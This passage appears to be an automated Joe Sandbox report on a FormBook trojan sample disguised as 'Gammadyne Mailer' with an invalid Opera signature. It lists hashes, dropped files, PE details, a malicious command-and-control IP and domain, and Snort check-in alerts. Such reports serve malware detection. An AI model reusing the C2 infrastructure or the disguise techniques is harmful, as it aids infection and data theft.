                          http://www.urwpp.de9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.341292306.0000000006177000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.zhongyicts.com.cn9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.como.9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersp9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmpfalse
                            high
                            http://www.sakkal.com9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comic9thuIDnsFV.exe, 00000001.00000003.334215573.000000000616D000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.goodfont.co.k)9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000E.00000000.465503164.000000000095C000.00000004.00000020.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.09thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                high
                                http://www.carterandcone.comexc9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cnMic9thuIDnsFV.exe, 00000001.00000003.332290487.000000000616B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.come9thuIDnsFV.exe, 00000001.00000003.334264597.000000000616D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.comc9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.comTC9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.comcr9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.opera.com09thuIDnsFV.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.comlt9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.comaF9thuIDnsFV.exe, 00000001.00000003.333788508.000000000616D000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.founder.com.cn/cnld9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmm9thuIDnsFV.exe, 00000001.00000003.342672431.000000000616B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.urwpp.de?9thuIDnsFV.exe, 00000001.00000003.341330812.0000000006178000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://en.w9thuIDnsFV.exe, 00000001.00000003.330013890.000000000616B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.coml9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlN9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.goodfont.co.krtp9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/frere-jones.html9thuIDnsFV.exe, 00000001.00000003.339998468.000000000618E000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.339943360.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers/cabarga.html9thuIDnsFV.exe, 00000001.00000003.340799548.000000000618E000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn69thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers$9thuIDnsFV.exe, 00000001.00000003.339414645.000000000616B000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers#9thuIDnsFV.exe, 00000001.00000003.341157570.000000000616B000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers89thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.goodfont.co.kr-c(9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.fontbureau.com/designers/9thuIDnsFV.exe, 00000001.00000003.338972632.000000000616B000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338849647.0000000006171000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designers59thuIDnsFV.exe, 00000001.00000003.339513065.000000000616B000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://survey-smiles.comwlanext.exe, 00000014.00000002.599683459.0000000003D9F000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.comopsz9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  5.79.68.101
                                                  www.driplockerstore.comNetherlands
                                                  60781LEASEWEB-NL-AMS-01NetherlandsNLtrue

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:452499
                                                  Start date:22.07.2021
                                                  Start time:14:03:16
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 9s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:9thuIDnsFV (renamed file extension from none to exe)
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:26
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@7/3@1/1
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                  • Quality average: 100%
                                                  • Quality standard deviation: 0%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 104.42.151.234, 20.82.209.183, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.211.4.86, 20.82.210.154
                                                  • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  14:04:06API Interceptor1x Sleep call for process: 9thuIDnsFV.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  LEASEWEB-NL-AMS-01NetherlandsNLQxnlprRUTx.exeGet hashmaliciousBrowse
                                                  • 81.171.22.7
                                                  YXYFqHRx2mGet hashmaliciousBrowse
                                                  • 31.186.168.14
                                                  F63V4i8eZU.exeGet hashmaliciousBrowse
                                                  • 212.32.237.90
                                                  mn9ju5i1tk.exeGet hashmaliciousBrowse
                                                  • 85.17.167.196
                                                  REPORT_USD65371.35.exeGet hashmaliciousBrowse
                                                  • 81.171.22.6
                                                  aJuocCMPkL.exeGet hashmaliciousBrowse
                                                  • 212.32.237.101
                                                  iGet hashmaliciousBrowse
                                                  • 5.79.83.30
                                                  w5G1Hw8i40.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  BRdDIezWwC.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  7VGeqwDKdb.exeGet hashmaliciousBrowse
                                                  • 81.171.22.7
                                                  9biD2MXxdb.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  O8O8CUUvAF.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exeGet hashmaliciousBrowse
                                                  • 81.171.31.214
                                                  V39ZNrnB5E.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  dLgAVTjufY.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  vNiyRd4GcH.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  9irkb5Rbn8.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  5EHqnAyk4E.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  IZNzZi2xvv.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219
                                                  4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exeGet hashmaliciousBrowse
                                                  • 185.227.110.219

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9thuIDnsFV.exe.log
                                                  Process:C:\Users\user\Desktop\9thuIDnsFV.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1119
                                                  Entropy (8bit):5.356708753875314
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                  MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                  SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                  SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                  SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                  C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe
                                                  Process:C:\Users\user\Desktop\9thuIDnsFV.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):648912
                                                  Entropy (8bit):6.555584592279825
                                                  Encrypted:false
                                                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                                                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                                                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                                                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                                                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Reputation:low
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.......*..................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0..%........(.......,.&&...-.&&+.}....+.}....+.*....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o....*.0..).........s.....,.&..(....-.+..+..{.....o.....*.*....0..$.........(.....-.&.,.+..+..{.....o....&.*.*.0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.
                                                  C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe:Zone.Identifier
                                                  Process:C:\Users\user\Desktop\9thuIDnsFV.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):6.555584592279825
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:9thuIDnsFV.exe
                                                  File size:648912
                                                  MD5:0e715db2198ff670f4bf0e88e0e9b547
                                                  SHA1:2de5030a9261655e5879e4faba7b5e79d1dd483e
                                                  SHA256:4dc8cb12314311a3bf1b1afa5cc5483284fda573f18c15ab0fef18b7b9ef9f98
                                                  SHA512:8fb7ea121d51c489bac9d8d6b35e94fc8bc5e5e218da53ad952326f6c558fa7484e54842b2c6abba36c5ec5bb0e6eb51fdab46b3f98daee3569ef8c6ec400bcd
                                                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@................................

                                                  File Icon

                                                  Icon Hash:d8aa9a8e96968eb2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x48bb96
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x60F89E0F [Wed Jul 21 22:22:07 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Authenticode Signature

                                                  Signature Valid:false
                                                  Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Signature Validation Error:The digital signature of the object did not verify
                                                  Error Number:-2146869232
                                                  Not Before, Not After
                                                  • 6/16/2019 5:00:00 PM 6/17/2022 5:00:00 AM
                                                  Subject Chain
                                                  • CN=Opera Software AS, O=Opera Software AS, L=Oslo, C=NO, SERIALNUMBER=916 368 127, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=NO
                                                  Version:3
                                                  Thumbprint MD5:E2F151D7231B321A29201726090932EC
                                                  Thumbprint SHA-1:878B0B298671F44FC739C08D826BB22DB1A2A021
                                                  Thumbprint SHA-256:C4F39751F735BA229C002983C0D6BDD4FD92A82FC97C9F5630D85C4CAA820BDA
                                                  Serial:05F4210DB2B283A32FF2AED29FCB68A4

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8bb3c0x57.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x12818.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x9ca000x1cd0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x89b9c0x89c00False0.745221755898zlib compressed data6.19781720277IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x8c0000x128180x12a00False0.266241086409data5.91214034297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x8c2500x8a8data
                                                  RT_ICON0x8caf80x568GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x8d0600x94a8data
                                                  RT_ICON0x965080x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4294967055
                                                  RT_ICON0x9a7300x25a8data
                                                  RT_ICON0x9ccd80x10a8data
                                                  RT_ICON0x9dd800x468GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON0x9e1e80x68data
                                                  RT_VERSION0x9e2500x412data
                                                  RT_MANIFEST0x9e6640x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright (C) 1999-2014 by Gammadyne Corporation - All Rights Reserved
                                                  Assembly Version44.1.0.0
                                                  InternalNameAAXZConsoleApp9.exe
                                                  FileVersion44.1.0.0
                                                  CompanyNameGammadyne Corporation
                                                  LegalTrademarks
                                                  CommentsGammadyne Mailer
                                                  ProductNameGammadyne Mailer
                                                  ProductVersion44.1.0.0
                                                  FileDescriptionGammadyne Mailer
                                                  OriginalFilenameAAXZConsoleApp9.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  07/22/21-14:06:04.151317TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.65.79.68.101
                                                  07/22/21-14:06:04.151317TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.65.79.68.101
                                                  07/22/21-14:06:04.151317TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.65.79.68.101

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 22, 2021 14:06:04.089623928 CEST4975680192.168.2.65.79.68.101
